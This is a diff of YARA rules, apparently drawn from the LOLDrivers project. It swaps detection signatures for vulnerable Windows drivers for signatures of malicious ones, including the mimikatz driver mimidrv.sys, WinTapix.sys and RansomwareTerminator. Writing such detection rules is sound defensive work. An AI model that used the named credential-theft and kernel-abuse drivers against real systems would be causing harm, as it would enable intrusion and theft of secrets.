-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Sunmicrosystemsinc_Vboxdrvsys_Sunvirtualbox_R_C894 : FILE
+rule LOLDRIVERS_MAL_Driver_Pinchinstechnologycoltd_Rwtkrlsys_Ransomwareterminator_930D
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - VBoxDrv.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_930da474.sys"
 		author = "Florian Roth"
-		id = "b4cef531-b146-5c20-b429-a90beaad5712"
+		id = "87bff18c-cbd3-5faa-955f-d215b2f58ea0"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11548-L11567"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L434-L453"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "c8940e2e9b069ec94f9f711150b313b437f8429f78d522810601b6ee8b52bada"
-		logic_hash = "4f0a6ffa08a2c219e47c6ae13f6cc6914fe7d0dccb0273bf0905dd9a71eb439f"
-		score = 40
+		hash = "930da474a6d1be97b54f2c81e883e14d62897aa58622e5b040e412bd36cee0a7"
+		logic_hash = "b96ea1d9788320b12743f9a50e9afe4fc8accc4e4867e34ec8b7e5134d5842ed"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c0042006f007800200053007500700070006f007200740020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00530075006e0020004d006900630072006f00730079007300740065006d0073002c00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0032002e0034002e007200340037003900370038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0032002e0034002e007200340037003900370038 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00530075006e0020005600690072007400750061006c0042006f0078 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300039002000530075006e0020004d006900630072006f00730079007300740065006d0073002c00200049006e0063002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005200570054004b0072006c }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e003800300038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00520061006e0073006f006d0077006100720065005400650072006d0069006e00610074006f0072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310036002000500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Pinduoduoltdcorp_Vboxdrv_Pinduoduosecurevdi_9DAB : FILE
+rule LOLDRIVERS_MAL_Driver_Mimidrv_Mimidrvmimikatz_2FAF
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - VBoxDrv.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "44e2c561-b9f4-5840-9e0c-53ffee5a3bd1"
+		id = "0160f2aa-f60f-5590-be0a-6751487eab92"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11570-L11589"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L456-L472"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "9dab4b6fddc8e1ec0a186aa8382b184a5d52cfcabaaf04ff9e3767021eb09cf4"
-		logic_hash = "894060011b20c84849499127305d8f1d45621c5893f74d59c9278067a329a4d2"
-		score = 40
-		quality = 80
-		tags = "FILE"
-
-	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c0042006f007800200053007500700070006f007200740020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e00640075006f00640075006f0020004c0074006400200043006f00720070 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0032002e0030002e003100330037003900300034 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0032002e0030002e003100330037003900300034 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00560042006f0078004400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500069006e00640075006f00640075006f00200053006500630075007200650020005600440049 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310035002d0032003000320031002000500069006e00640075006f00640075006f00200043006f00720070006f0072006100740069006f006e }
+		hash = "2faf95a3405578d0e613c8d88d534aa7233da0a6217ce8475890140ab8fb33c8"
+		logic_hash = "e7b3f0a8f5a91896f7d487a39c622b12fc7488f9f80c80b6b551e7e5f6a67f18"
+		score = 70
+		quality = 80
+		tags = ""
+
+	strings:
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310035002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Tgsoftsas_Viragtsys_Viritagentsystem_18DE : FILE
+rule LOLDRIVERS_MAL_Driver_Pinchinstechnologycoltd_Rwtkrlsys_Ransomwareterminator_146B
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - viragt64.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_146b8f4f.sys"
 		author = "Florian Roth"
-		id = "c3b0b3b0-9281-5d90-bf26-6c4c46c4143b"
+		id = "47f0ff39-4726-5c66-90a8-981cbd53d2d1"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11592-L11611"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L475-L494"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "18deed37f60b6aa8634dda2565a0485452487d7bce88afb49301a7352db4e506"
-		logic_hash = "d01aeb1783377e6067976e6955e63495706c96c8d6c113b393a47e6fe17992f0"
-		score = 40
+		hash = "146b8f4fc91a4915e8f6aa6e0d871f7161a809c46760ef602bab534836142436"
+		logic_hash = "25a4fec1795204ef5e6dec0f1f7f50f21362fc5105489ae387a7358446d4927c"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072004900540020004100670065006e0074002000530079007300740065006d }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0054004700200053006f0066007400200053002e0061002e0073002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002c00200030002c00200030002c00200030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002c00200030002c00200030002c00200030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]007600690072006100670074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005600690072004900540020004100670065006e0074002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00760069007200610067007400360034002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200054004700200053006f0066007400200053002e0061002e0073002e00200032003000310031002c002000320030003100320020002d0020007700770077002e007400670073006f00660074002e00690074 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005200570054004b0072006c }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0030002e0031002e0030002e003200350031 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0030002e0038 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00520061006e0073006f006d0077006100720065005400650072006d0069006e00610074006f0072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310036002000500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Avgtechnologiesczsro_Aswarpotsys_Avginternetsecuritysystem_8CFD : FILE
+rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_2FD4
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "4affbef6-26ac-5087-a881-32fad34fd192"
+		id = "e77f1fc7-4700-5afe-908f-b0d206757365"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11614-L11633"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L497-L518"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "8cfd5b2102fbc77018c7fe6019ec15f07da497f6d73c32a31f4ba07e67ec85d9"
-		logic_hash = "5bc5d8a6cd02e9a684515ea333084c788353641cb29ff08f18a1066d533cf0ed"
-		score = 40
+		hash = "2fd43a749b5040ebfafd7cdbd088e27ef44341d121f313515ebde460bf3aaa21"
+		hash = "7824931e55249a501074a258b4f65cd66157ee35672ba17d1c0209f5b0384a28"
+		hash = "28f5aa194a384680a08c0467e94a8fc40f8b0f3f2ac5deb42e0f51a80d27b553"
+		logic_hash = "e24fab351505faf86bd12d6dd97662542c8cf5fca09d916b716af1478f3c9ddf"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00410056004700200061006e0074006900200072006f006f0074006b00690074 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00410056004700200054006500630068006e006f006c006f006700690065007300200043005a002c00200073002e0072002e006f002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310039002e0037002e0034003200340036002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310039002e0037002e0034003200340036002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00410056004700200049006e007400650072006e00650074002000530065006300750072006900740079002000530079007300740065006d0020 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310039002000410056004700200054006500630068006e006f006c006f006700690065007300200043005a002c00200073002e0072002e006f002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310035002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpotsys_Avastantivirus_D5C4 : FILE
+rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Ntbiosys_Microsoftrwindowsrntoperatingsystem_C0D8
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - ntbios_2.sys"
 		author = "Florian Roth"
-		id = "9994e1c0-b86b-578d-8002-554584e1de2b"
+		id = "f16b4b22-985a-5d39-ae51-709aa9a69d8d"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11636-L11655"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L521-L541"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "d5c4ff35eaa74ccdb80c7197d3d113c9cd38561070f2aa69c0affe8ed84a77c9"
-		logic_hash = "d6ad094f2e26ff574917770a94af31110f2ed68e47ee082ad4adfcd7376679a5"
-		score = 40
+		hash = "c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c"
+		hash = "96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc"
+		logic_hash = "74ad0b57644d82a77bc902786250156f5e3700671bdf9765055b5908dc345a67"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041007600610073007400200061006e0074006900200072006f006f0074006b00690074 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0041005600410053005400200053006f006600740077006100720065 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310038002e0036002e0033003900370039002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310038002e0036002e0033003900370039002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041007600610073007400200041006e00740069007600690072007500730020 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300031003800200041005600410053005400200053006f006600740077006100720065 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006e007400620069006f00730020006400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002c00200030002c00200032002c00200031 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002c00200030002c00200032002c00200031 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e007400620069006f002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0020004d006900630072006f0073006f00660074002800520029002000570069006e0064006f0077007300200028005200290020004e00540020004f007000650072006100740069006e0067002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e007400620069006f0073002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]7248674362406709002000280043002900200032003000300033 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Wj_Kprocesshacker_7021 : FILE
+rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Wintapixsys_Microsoftwindowsoperatingsystem_8578
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - kprocesshacker.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - WinTapix.sys, SRVNET2.SYS"
 		author = "Florian Roth"
-		id = "dd2a2bfd-12be-5cdb-8293-c51220015bd9"
+		id = "0bb182e8-e64b-5b01-9ca5-105212ebeb51"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11658-L11676"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L544-L564"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4"
-		logic_hash = "e5d17a5b57183c3a27815b5b64014e9d95f49129cd451c62380ba8e1b4d25be6"
-		score = 40
+		hash = "8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330"
+		hash = "1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e"
+		logic_hash = "dd85f0dc471425fe692e5a51580a97facdaea45505c48b5e01dd6dbc975f2ffe"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004b00500072006f0063006500730073004800610063006b00650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0077006a00330032 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0033002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0033002e0030 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004b00500072006f0063006500730073004800610063006b00650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006b00700072006f0063006500730073006800610063006b00650072002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004c006900630065006e00730065006400200075006e006400650072002000740068006500200047004e0055002000470050004c002c002000760033002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570069006e0064006f007700730020004b00650072006e0065006c00200045007800650063007500740069007600650020004d006f00640075006c0065 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0033002e0039003600300030002e003100360033003800340020002800770069006e0062006c00750065005f00720074006d002e003100330030003800320031002d00310036003200330029 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0033002e0039003600300030002e00310036003300380034 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00570069006e00540061007000690078002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f0066007400ae002000570069006e0064006f0077007300ae0020004f007000650072006100740069006e0067002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00570069006e00540061007000690078002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Trendmicroinc_Tmcommsys_Trendmicroeyes_76E8 : FILE
+rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Usbxhcisys_Microsoftwindowsoperatingsystem_290B
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - TmComm.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_290bc782.sys"
 		author = "Florian Roth"
-		id = "2d26b107-7fcb-5acd-94e4-ed18c399ad66"
+		id = "aa50e42c-7b09-535d-9c2c-e9e11872e695"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11679-L11698"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L567-L586"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "76e807b6c0214e66455f09a8de8faad40b738982ca84470f0043de0290449524"
-		logic_hash = "0a9822cd471bb7fdaab454e824e31e1dcd685f9226c4fa34af4f13dd228dc97b"
-		score = 40
+		hash = "290bc7822da41f0b5580b27c8d14a2a5c3fbe3e4b6921957b134efc6beeb0aeb"
+		logic_hash = "6153c594c5b261644e1ed03f4187227af0bdf16ad5576a7df431e07a28b73432"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400720065006e0064004d006900630072006f00200043006f006d006d006f006e0020004d006f00640075006c0065 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00320030002e0030002e0031003000300038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00320030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200045007900650073 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003100330020005400720065006e00640020004d006900630072006f00200049006e0063006f00720070006f00720061007400650064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005500530042002000580048004300490020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0032002e0039003200300030002e003200320030003900390020002800770069006e0038005f006c00640072002e003100370030003200310032002d00300036003000300029 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0032002e0039003200300030002e00320032003000390039 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0075007300620078006800630069002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f0066007400ae002000570069006e0064006f0077007300ae0020004f007000650072006100740069006e0067002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0075007300620078006800630069002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Paragonsoftwaregmbh_Biontdrv_Paragonsystemutilities_174C : FILE
+rule LOLDRIVERS_MAL_Driver_Basil_Windivertsys_Windivertdriver_8DA0
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - BioNTdrv.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - windivert.sys"
 		author = "Florian Roth"
-		id = "e9f2040c-7222-5513-b8c5-9917beb2cf58"
+		id = "b2c5b02b-7fe2-5dcc-8c96-c67212780220"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11701-L11719"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L589-L610"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "174c8d771d31d70fc95448e961a395f5ceb7658f0cc381a718fb3b854cde4efe"
-		logic_hash = "7476011ce35a732c1bd404636bacf63503e88e0463729041aa11221b92cc8d97"
-		score = 40
+		hash = "8da085332782708d8767bcace5327a6ec7283c17cfb85e40b03cd2323a90ddc2"
+		hash = "2f43f4251be4d72dd56c91bf6cce475d379eb9ba6c4dda2be3022ea633d5e807"
+		hash = "8248306bcc5fae20fd4f3d5c44f962c85cddbe020b34a1799350ce2034154b7d"
+		logic_hash = "ec4c9f576f33bdb22610fb9f4462b7a6c113ad704b1f6908e949dc65dde28bd5"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041002000700061007200740020006f0066002000500061007200610067006f006e002000530079007300740065006d0020005500740069006c00690074006900650073 }
